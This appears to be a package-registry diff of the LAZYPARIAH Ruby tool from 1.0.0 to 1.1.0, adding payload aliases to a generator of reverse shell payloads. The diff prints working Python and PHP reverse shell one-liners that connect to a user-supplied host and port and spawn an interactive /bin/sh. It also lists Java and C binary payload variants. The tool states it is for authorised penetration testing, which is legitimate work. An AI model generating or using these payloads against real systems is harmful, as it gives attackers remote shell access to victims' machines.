lazypariah 1.0.0 → 1.1.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/bin/lazypariah +39 -7
- metadata +1 -1
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 1288e500075f52658c2f940333c165b9193428741782923954475ae633aaa649
|
|
4
|
+
data.tar.gz: 98f23bade85e537388413124dbccd9342df216b062b739cd883303a8ce57fcc2
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 6615b3769dff4d020ab040d0cf954b73e5c36a458777c69f8a17f6b4b726d3885b45f27a2cda8eba440afe6de2566591f69837607b3a61835676af6b54581dad
|
|
7
|
+
data.tar.gz: ea35b055a2a0e588d6d90831fca667ba82fd7abdf2c635e4027b5761e33338336f34b17ace98fc3a33b1de5c5cd14d038b66a77f12870fe21ddd5ce26ca04571
|
data/bin/lazypariah
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
#!/usr/bin/env ruby
|
|
2
2
|
#
|
|
3
3
|
# Title: LAZYPARIAH
|
|
4
|
-
# Version: 1.
|
|
4
|
+
# Version: 1.1.0
|
|
5
5
|
# Description:
|
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
|
@@ -29,7 +29,7 @@ require "stringio"
|
|
|
29
29
|
|
|
30
30
|
# Define constants.
|
|
31
31
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
|
32
|
-
PROGRAM_VERSION = "1.
|
|
32
|
+
PROGRAM_VERSION = "1.1.0".freeze()
|
|
33
33
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
|
34
34
|
|
|
35
35
|
# Define payload list.
|
|
@@ -67,6 +67,28 @@ PAYLOAD_LIST = [
|
|
|
67
67
|
"c_binary_gzip_hex"
|
|
68
68
|
].sort()
|
|
69
69
|
|
|
70
|
+
# Define dictionary of payload aliases for backwards compatibility with versions < 1.0.0.
|
|
71
|
+
PAYLOAD_BC_DICT = {
|
|
72
|
+
"php_fd_3"=>{"payload"=>"php_fd", "fd"=>"3"},
|
|
73
|
+
"php_fd_4"=>{"payload"=>"php_fd", "fd"=>"4"},
|
|
74
|
+
"php_fd_5"=>{"payload"=>"php_fd", "fd"=>"5"},
|
|
75
|
+
"php_fd_6"=>{"payload"=>"php_fd", "fd"=>"6"},
|
|
76
|
+
"php_fd_3_c"=>{"payload"=>"php_fd_c", "fd"=>"3"},
|
|
77
|
+
"php_fd_4_c"=>{"payload"=>"php_fd_c", "fd"=>"4"},
|
|
78
|
+
"php_fd_5_c"=>{"payload"=>"php_fd_c", "fd"=>"5"},
|
|
79
|
+
"php_fd_6_c"=>{"payload"=>"php_fd_c", "fd"=>"6"},
|
|
80
|
+
"php_fd_3_tags"=>{"payload"=>"php_fd_tags", "fd"=>"3"},
|
|
81
|
+
"php_fd_4_tags"=>{"payload"=>"php_fd_tags", "fd"=>"4"},
|
|
82
|
+
"php_fd_5_tags"=>{"payload"=>"php_fd_tags", "fd"=>"5"},
|
|
83
|
+
"php_fd_6_tags"=>{"payload"=>"php_fd_tags", "fd"=>"6"},
|
|
84
|
+
"python3_c"=>{"payload"=>"python_c", "pv"=>"3"},
|
|
85
|
+
"python2_c"=>{"payload"=>"python_c", "pv"=>"2"},
|
|
86
|
+
"python3_b64"=>{"payload"=>"python_b64", "pv"=>"3"},
|
|
87
|
+
"python2_b64"=>{"payload"=>"python_b64", "pv"=>"2"},
|
|
88
|
+
"python3_hex"=>{"payload"=>"python_hex", "pv"=>"3"},
|
|
89
|
+
"python2_hex"=>{"payload"=>"python_hex", "pv"=>"2"}
|
|
90
|
+
}
|
|
91
|
+
|
|
70
92
|
# Define function for displaying program information.
|
|
71
93
|
def prog_info(donation_info=true)
|
|
72
94
|
puts("#{PROGRAM_NAME} #{PROGRAM_VERSION}")
|
|
@@ -146,7 +168,7 @@ begin
|
|
|
146
168
|
puts("\nToo many command line arguments were given to #{PROGRAM_NAME}.\n")
|
|
147
169
|
puts(option_parser)
|
|
148
170
|
exit()
|
|
149
|
-
elsif not PAYLOAD_LIST.include?(ARGV[0])
|
|
171
|
+
elsif not PAYLOAD_LIST.include?(ARGV[0]) and not PAYLOAD_BC_DICT.include?(ARGV[0])
|
|
150
172
|
prog_info()
|
|
151
173
|
puts("\n#{PROGRAM_NAME} did not recognise the specified payload. Please consult the valid list of payloads below.\n")
|
|
152
174
|
puts(option_parser)
|
|
@@ -171,7 +193,17 @@ begin
|
|
|
171
193
|
exit()
|
|
172
194
|
end
|
|
173
195
|
|
|
174
|
-
|
|
196
|
+
# Parse payload, applying aliases for backwards compatibility with versions < 1.0.0.
|
|
197
|
+
if PAYLOAD_BC_DICT.include?(ARGV[0])
|
|
198
|
+
bc_dict = PAYLOAD_BC_DICT[ARGV[0]]
|
|
199
|
+
selected_payload = bc_dict["payload"]
|
|
200
|
+
tcp_fd = bc_dict["fd"]
|
|
201
|
+
python_version = bc_dict["pv"]
|
|
202
|
+
else
|
|
203
|
+
selected_payload = ARGV[0]
|
|
204
|
+
end
|
|
205
|
+
|
|
206
|
+
case selected_payload
|
|
175
207
|
when "python"
|
|
176
208
|
print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
177
209
|
when "python_c"
|
|
@@ -196,7 +228,7 @@ begin
|
|
|
196
228
|
if not tcp_fd
|
|
197
229
|
puts("The payload you have selected requires a file descriptor to be specified. Please specify the file descriptor used by the target for TCP via the command-line argument \"-D NUMBER\" or \"--fd NUMBER\".")
|
|
198
230
|
else
|
|
199
|
-
case
|
|
231
|
+
case selected_payload
|
|
200
232
|
when "php_fd"
|
|
201
233
|
print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
|
|
202
234
|
when "php_fd_c"
|
|
@@ -241,7 +273,7 @@ begin
|
|
|
241
273
|
|
|
242
274
|
File.open(temp_dir+"/rs.class", "r") do |f|
|
|
243
275
|
java_payload = f.read()
|
|
244
|
-
case
|
|
276
|
+
case selected_payload
|
|
245
277
|
when "java_class_binary"
|
|
246
278
|
print_output(java_payload, new_line=false)
|
|
247
279
|
when "java_class_b64"
|
|
@@ -270,7 +302,7 @@ begin
|
|
|
270
302
|
|
|
271
303
|
File.open(temp_dir+"/rs", "r") do |f|
|
|
272
304
|
binary_payload = f.read()
|
|
273
|
-
case
|
|
305
|
+
case selected_payload
|
|
274
306
|
when "c_binary"
|
|
275
307
|
print_output(binary_payload, new_line=false)
|
|
276
308
|
when "c_binary_b64"
|